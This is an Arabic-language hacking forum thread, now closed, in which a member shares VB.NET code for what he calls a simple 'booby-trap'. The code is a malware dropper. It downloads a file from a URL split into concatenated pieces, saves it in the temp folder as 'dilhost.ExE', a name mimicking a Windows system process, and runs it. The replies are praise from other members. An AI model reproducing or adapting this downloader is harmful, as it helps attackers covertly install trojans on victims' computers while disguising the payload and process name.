حالة الموضوع:
مغلق
  1. كوبرا بغداد

    كوبرا بغداد New Developer

    الأنتساب:
    ‏23 مارس 2016
    المشاركات:
    39
    الإعجابات المتلقاة:
    33
    نقاط الجائزة:
    18
    الوظيفة:
    طالب 4 متوسط
    الإقامة:
    المانيا
    السلام عليكم ورحمة
    الله حبيت اشرحلكم تلغيمه بصيطه
    والكود سابقأ وطرحه عقرب النجف حبيت اسوي فيديو عليه
    اترككم مع الفيديو
    الكود
    Dim Download As New Net.WebClient
    Dim sql As String
    sql = "قسم 1 من الداونلودر"
    Dim show As String
    Dim startt As String
    startt = "قسم 2 من الداونلودر"
    show = "قسم 4 من الداونلودر"
    Dim hidee As String
    hidee = "قسم 3 من الداونلودر"
    Dim strt As String
    strt = "/dilhost.ExE" 'اسم العملية
    Dim formm1 As String
    formm1 = "temp" 'مكان النزول تقدر تقسمة ايضاً للتوهيم
    Download.DownloadFile(sql + startt + hidee + show, Environ(formm1) & strt)
    Shell(Environ(formm1) & strt)



    تحياتي لجميع اصدقائي والى عراق تيم خاصتن
     
  2. Ghost RAT

    Ghost RAT مراقب عآم

    الأنتساب:
    ‏12 ابريل 2015
    المشاركات:
    474
    الإعجابات المتلقاة:
    162
    نقاط الجائزة:
    43
    الجنس:
    ذكر
    الإقامة:
    IRAQ
    مبدع لا تحرمنا من جديدك
     
  3. αℓɪ αℓɪяαqɪ

    αℓɪ αℓɪяαqɪ Active DeveloPer

    الأنتساب:
    ‏30 يونيو 2015
    المشاركات:
    164
    الإعجابات المتلقاة:
    38
    نقاط الجائزة:
    28
    عاشت ايدك بطل
    استمر ولا تحرمنا من جديدك
     
  4. Elite Trojan

    Elite Trojan Developer

    الأنتساب:
    ‏20 ابريل 2012
    المشاركات:
    68
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    يعطيك العافية على الموضوع ,

    واصل يا مبدع
     
  5. مسہہٰتہہٰر بٰٰرايہٰمر

    مسہہٰتہہٰر بٰٰرايہٰمر ᎿᎻᎬ ᏞᎥᏫᏁ موقوف لمخالفة الشروط

    الأنتساب:
    ‏1 فبراير 2016
    المشاركات:
    288
    الإعجابات المتلقاة:
    67
    نقاط الجائزة:
    28
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق
    واصل في الابداع يا مبدع لا تحرمنا منك
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة